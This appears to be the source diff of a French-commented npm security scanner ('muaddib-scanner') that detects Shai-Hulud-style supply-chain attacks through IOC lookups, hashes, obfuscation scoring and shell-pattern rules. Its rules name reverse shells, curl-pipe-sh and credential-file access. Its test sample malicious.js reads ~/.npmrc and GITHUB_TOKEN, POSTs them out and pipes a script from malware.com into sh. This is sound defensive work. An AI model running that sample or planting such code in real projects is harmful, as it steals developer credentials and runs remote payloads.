muaddib-scanner 1.0.0

package/src/scanner/dependencies.js

@@ -0,0 +1,110 @@
+const fs = require('fs');
+const path = require('path');
+const { loadCachedIOCs } = require('../ioc/updater.js');
+
+async function scanDependencies(targetPath) {
+  const threats = [];
+  const nodeModulesPath = path.join(targetPath, 'node_modules');
+  const iocs = loadCachedIOCs();
+
+  if (!fs.existsSync(nodeModulesPath)) {
+    return threats;
+  }
+
+  const packages = listPackages(nodeModulesPath);
+
+  for (const pkg of packages) {
+    // Verifie si package connu malveillant (IOCs caches)
+    const maliciousPkg = iocs.packages.find(p => p.name === pkg.name);
+    if (maliciousPkg) {
+      threats.push({
+        type: 'known_malicious_package',
+        severity: 'CRITICAL',
+        message: `Package malveillant connu: ${pkg.name} (source: ${maliciousPkg.source})`,
+        file: `node_modules/${pkg.name}`
+      });
+      continue;
+    }
+
+    // Verifie les fichiers suspects (IOCs caches)
+    for (const suspFile of iocs.files || []) {
+      const filePath = path.join(pkg.path, suspFile);
+      if (fs.existsSync(filePath)) {
+        threats.push({
+          type: 'suspicious_file',
+          severity: 'CRITICAL',
+          message: `Fichier Shai-Hulud "${suspFile}" dans ${pkg.name}`,
+          file: `node_modules/${pkg.name}/${suspFile}`
+        });
+      }
+    }
+
+    // Verifie les marqueurs dans package.json
+    const pkgJsonPath = path.join(pkg.path, 'package.json');
+    if (fs.existsSync(pkgJsonPath)) {
+      const pkgContent = fs.readFileSync(pkgJsonPath, 'utf8');
+      const pkgJson = JSON.parse(pkgContent);
+      const scripts = pkgJson.scripts || {};
+
+      // Verifie les marqueurs Shai-Hulud
+      for (const marker of iocs.markers || []) {
+        if (pkgContent.includes(marker)) {
+          threats.push({
+            type: 'shai_hulud_marker',
+            severity: 'CRITICAL',
+            message: `Marqueur "${marker}" detecte dans ${pkg.name}`,
+            file: `node_modules/${pkg.name}/package.json`
+          });
+        }
+      }
+
+      // Verifie les lifecycle scripts
+      if (scripts.preinstall || scripts.postinstall) {
+        threats.push({
+          type: 'lifecycle_script_dependency',
+          severity: 'MEDIUM',
+          message: `Dependance "${pkg.name}" a un script ${scripts.preinstall ? 'preinstall' : 'postinstall'}`,
+          file: `node_modules/${pkg.name}/package.json`
+        });
+      }
+    }
+  }
+
+  return threats;
+}
+
+function listPackages(nodeModulesPath) {
+  const packages = [];
+  const items = fs.readdirSync(nodeModulesPath);
+
+  for (const item of items) {
+    if (item.startsWith('.')) continue;
+
+    const itemPath = path.join(nodeModulesPath, item);
+    const stat = fs.statSync(itemPath);
+
+    if (!stat.isDirectory()) continue;
+
+    if (item.startsWith('@')) {
+      const scopedItems = fs.readdirSync(itemPath);
+      for (const scopedItem of scopedItems) {
+        const scopedPath = path.join(itemPath, scopedItem);
+        if (fs.statSync(scopedPath).isDirectory()) {
+          packages.push({
+            name: `${item}/${scopedItem}`,
+            path: scopedPath
+          });
+        }
+      }
+    } else {
+      packages.push({
+        name: item,
+        path: itemPath
+      });
+    }
+  }
+
+  return packages;
+}
+
+module.exports = { scanDependencies };

package/src/scanner/hash.js

@@ -0,0 +1,68 @@
+const fs = require('fs');
+const path = require('path');
+const crypto = require('crypto');
+const { loadCachedIOCs } = require('../ioc/updater.js');
+
+async function scanHashes(targetPath) {
+  const threats = [];
+  const iocs = loadCachedIOCs();
+  const knownHashes = iocs.hashes || [];
+
+  if (knownHashes.length === 0) {
+    return threats;
+  }
+
+  const nodeModulesPath = path.join(targetPath, 'node_modules');
+  
+  if (!fs.existsSync(nodeModulesPath)) {
+    return threats;
+  }
+
+  const jsFiles = findAllJsFiles(nodeModulesPath);
+
+  for (const file of jsFiles) {
+    const hash = computeHash(file);
+    
+    if (knownHashes.includes(hash)) {
+      threats.push({
+        type: 'known_malicious_hash',
+        severity: 'CRITICAL',
+        message: `Hash malveillant detecte: ${hash.substring(0, 16)}...`,
+        file: path.relative(targetPath, file)
+      });
+    }
+  }
+
+  return threats;
+}
+
+function computeHash(filePath) {
+  const content = fs.readFileSync(filePath);
+  return crypto.createHash('sha256').update(content).digest('hex');
+}
+
+function findAllJsFiles(dir, results = []) {
+  if (!fs.existsSync(dir)) return results;
+
+  const items = fs.readdirSync(dir);
+
+  for (const item of items) {
+    const fullPath = path.join(dir, item);
+    
+    try {
+      const stat = fs.statSync(fullPath);
+      
+      if (stat.isDirectory()) {
+        findAllJsFiles(fullPath, results);
+      } else if (item.endsWith('.js')) {
+        results.push(fullPath);
+      }
+    } catch (e) {
+      // Ignore les erreurs de permission
+    }
+  }
+
+  return results;
+}
+
+module.exports = { scanHashes, computeHash };

package/src/scanner/obfuscation.js

@@ -0,0 +1,99 @@
+const fs = require('fs');
+const path = require('path');
+
+function detectObfuscation(targetPath) {
+  const threats = [];
+  const files = findJsFiles(targetPath);
+
+  for (const file of files) {
+    const content = fs.readFileSync(file, 'utf8');
+    const relativePath = path.relative(targetPath, file);
+
+    const signals = [];
+    let score = 0;
+
+    // 1. Ratio code sur une seule ligne
+    const lines = content.split('\n').filter(l => l.trim());
+    const longLines = lines.filter(l => l.length > 500);
+    if (lines.length > 0 && longLines.length / lines.length > 0.3) {
+      score += 25;
+      signals.push('long_single_lines');
+    }
+
+    // 2. Hex escapes massifs
+    const hexMatches = content.match(/\\x[0-9a-fA-F]{2}/g) || [];
+    if (hexMatches.length > 20) {
+      score += 25;
+      signals.push('hex_escapes');
+    }
+
+    // 3. Unicode escapes massifs
+    const unicodeMatches = content.match(/\\u[0-9a-fA-F]{4}/g) || [];
+    if (unicodeMatches.length > 20) {
+      score += 20;
+      signals.push('unicode_escapes');
+    }
+
+    // 4. Variables style obfuscateur (_0x, _0xabc)
+    const obfuscatedVars = content.match(/\b_0x[a-f0-9]+\b/gi) || [];
+    if (obfuscatedVars.length > 5) {
+      score += 30;
+      signals.push('obfuscated_variables');
+    }
+
+    // 5. String arrays suspects
+    if (/var\s+\w+\s*=\s*\[(['"][^'"]{0,50}['"],?\s*){10,}\]/.test(content)) {
+      score += 25;
+      signals.push('string_array');
+    }
+
+    // 6. atob/btoa avec eval
+    if (/atob\s*\(/.test(content) && /(eval|Function)\s*\(/.test(content)) {
+      score += 30;
+      signals.push('base64_eval');
+    }
+
+    if (score >= 40) {
+      threats.push({
+        type: 'obfuscation_detected',
+        severity: score >= 70 ? 'CRITICAL' : 'HIGH',
+        message: `Code obfusque (score: ${score}). Signaux: ${signals.join(', ')}`,
+        file: relativePath
+      });
+    }
+  }
+
+  return threats;
+}
+
+const EXCLUDED_DIRS = [
+  'test',
+  'node_modules',
+  '.git',
+  'src'
+];
+
+function findJsFiles(dir) {
+  const results = [];
+  
+  if (!fs.existsSync(dir)) return results;
+  
+  const items = fs.readdirSync(dir);
+  
+  for (const item of items) {
+    if (EXCLUDED_DIRS.includes(item)) continue;
+    
+    const fullPath = path.join(dir, item);
+    const stat = fs.statSync(fullPath);
+    
+    if (stat.isDirectory()) {
+      results.push(...findJsFiles(fullPath));
+    } else if (item.endsWith('.js')) {
+      results.push(fullPath);
+    }
+  }
+  
+  return results;
+}
+
+module.exports = { detectObfuscation };

package/src/scanner/package.js

@@ -0,0 +1,60 @@
+const fs = require('fs');
+const path = require('path');
+
+const SUSPICIOUS_SCRIPTS = [
+  'preinstall',
+  'postinstall',
+  'preuninstall',
+  'postuninstall'
+];
+
+const DANGEROUS_PATTERNS = [
+  { pattern: /curl\s+.*\|.*sh/, name: 'curl_pipe_sh' },
+  { pattern: /wget\s+.*\|.*sh/, name: 'wget_pipe_sh' },
+  { pattern: /eval\s*\(/, name: 'eval_usage' },
+  { pattern: /child_process/, name: 'child_process' },
+  { pattern: /\.npmrc/, name: 'npmrc_access' },
+  { pattern: /GITHUB_TOKEN/, name: 'github_token_access' },
+  { pattern: /AWS_/, name: 'aws_credential_access' },
+  { pattern: /base64/, name: 'base64_encoding' }
+];
+
+async function scanPackageJson(targetPath) {
+  const threats = [];
+  const pkgPath = path.join(targetPath, 'package.json');
+
+if (!fs.existsSync(pkgPath)) {
+    return threats;
+  }
+
+  const pkg = JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
+  const scripts = pkg.scripts || {};
+
+  for (const scriptName of SUSPICIOUS_SCRIPTS) {
+    if (scripts[scriptName]) {
+      const scriptContent = scripts[scriptName];
+
+      threats.push({
+        type: 'lifecycle_script',
+        severity: 'MEDIUM',
+        message: `Script "${scriptName}" detecte. Vecteur d'attaque courant.`,
+        file: 'package.json'
+      });
+
+      for (const { pattern, name } of DANGEROUS_PATTERNS) {
+        if (pattern.test(scriptContent)) {
+          threats.push({
+            type: name,
+            severity: 'HIGH',
+            message: `Pattern dangereux "${name}" dans script "${scriptName}".`,
+            file: 'package.json'
+          });
+        }
+      }
+    }
+  }
+
+  return threats;
+}
+
+module.exports = { scanPackageJson };

package/src/scanner/shell.js

@@ -0,0 +1,63 @@
+const fs = require('fs');
+const path = require('path');
+
+const MALICIOUS_PATTERNS = [
+  { pattern: /curl.*\|.*sh/, name: 'curl_pipe_shell', severity: 'HIGH' },
+  { pattern: /wget.*&&.*chmod.*\+x/, name: 'wget_chmod_exec', severity: 'HIGH' },
+  { pattern: /bash\s+-i\s+>&\s+\/dev\/tcp/, name: 'reverse_shell', severity: 'CRITICAL' },
+  { pattern: /nc\s+-e\s+\/bin\/(ba)?sh/, name: 'netcat_shell', severity: 'CRITICAL' },
+  { pattern: /rm\s+-rf\s+(~\/|\$HOME|\/home)/, name: 'home_deletion', severity: 'CRITICAL' },
+  { pattern: /shred.*\$HOME/, name: 'shred_home', severity: 'CRITICAL' },
+  { pattern: /curl.*-X\s*POST.*-d/, name: 'curl_exfiltration', severity: 'HIGH' },
+  { pattern: /\.npmrc/, name: 'npmrc_access', severity: 'HIGH' },
+  { pattern: /\.ssh/, name: 'ssh_access', severity: 'HIGH' }
+];
+
+async function scanShellScripts(targetPath) {
+  const threats = [];
+  
+  // Cherche les fichiers .sh
+  const files = findFiles(targetPath, '.sh');
+  
+  for (const file of files) {
+    const content = fs.readFileSync(file, 'utf8');
+    
+    for (const { pattern, name, severity } of MALICIOUS_PATTERNS) {
+      if (pattern.test(content)) {
+        threats.push({
+          type: name,
+          severity: severity,
+          message: `Pattern malveillant "${name}" detecte.`,
+          file: path.relative(targetPath, file)
+        });
+      }
+    }
+  }
+
+  return threats;
+}
+
+function findFiles(dir, extension) {
+  const results = [];
+  
+  if (!fs.existsSync(dir)) return results;
+  
+  const items = fs.readdirSync(dir);
+  
+  for (const item of items) {
+    if (item === 'node_modules' || item === '.git') continue;
+    
+    const fullPath = path.join(dir, item);
+    const stat = fs.statSync(fullPath);
+    
+    if (stat.isDirectory()) {
+      results.push(...findFiles(fullPath, extension));
+    } else if (item.endsWith(extension)) {
+      results.push(fullPath);
+    }
+  }
+  
+  return results;
+}
+
+module.exports = { scanShellScripts };

package/src/watch.js

@@ -0,0 +1,37 @@
+const fs = require('fs');
+const path = require('path');
+const { run } = require('./index.js');
+
+let debounceTimer = null;
+
+function watch(targetPath) {
+  console.log(`[MUADDIB] Surveillance de ${targetPath}\n`);
+  console.log('[INFO] Ctrl+C pour arreter\n');
+
+  // Scan initial
+  run(targetPath, { json: false });
+
+  // Surveille les changements
+  const watchPaths = [
+    path.join(targetPath, 'package.json'),
+    path.join(targetPath, 'package-lock.json'),
+    path.join(targetPath, 'node_modules')
+  ];
+
+  for (const watchPath of watchPaths) {
+    if (fs.existsSync(watchPath)) {
+      fs.watch(watchPath, { recursive: true }, (eventType, filename) => {
+        if (debounceTimer) clearTimeout(debounceTimer);
+        
+        debounceTimer = setTimeout(() => {
+          console.log(`\n[CHANGE] ${filename} modifie`);
+          console.log('[MUADDIB] Re-scan...\n');
+          run(targetPath, { json: false });
+        }, 1000);
+      });
+      console.log(`[WATCH] ${watchPath}`);
+    }
+  }
+}
+
+module.exports = { watch };

package/test/samples/malicious.js

@@ -0,0 +1,20 @@
+// Exemple de code malveillant style Shai-Hulud
+const fs = require('fs');
+const https = require('https');
+const { exec } = require('child_process');
+
+// Vol de credentials
+const npmrc = fs.readFileSync(process.env.HOME + '/.npmrc', 'utf8');
+const token = process.env.GITHUB_TOKEN;
+
+// Exfiltration
+const data = JSON.stringify({ npmrc, token });
+const req = https.request('https://api.github.com/repos', {
+  method: 'POST',
+  headers: { 'Content-Type': 'application/json' }
+});
+req.write(data);
+req.end();
+
+// Execution de commande
+exec('curl https://malware.com/payload.sh | sh');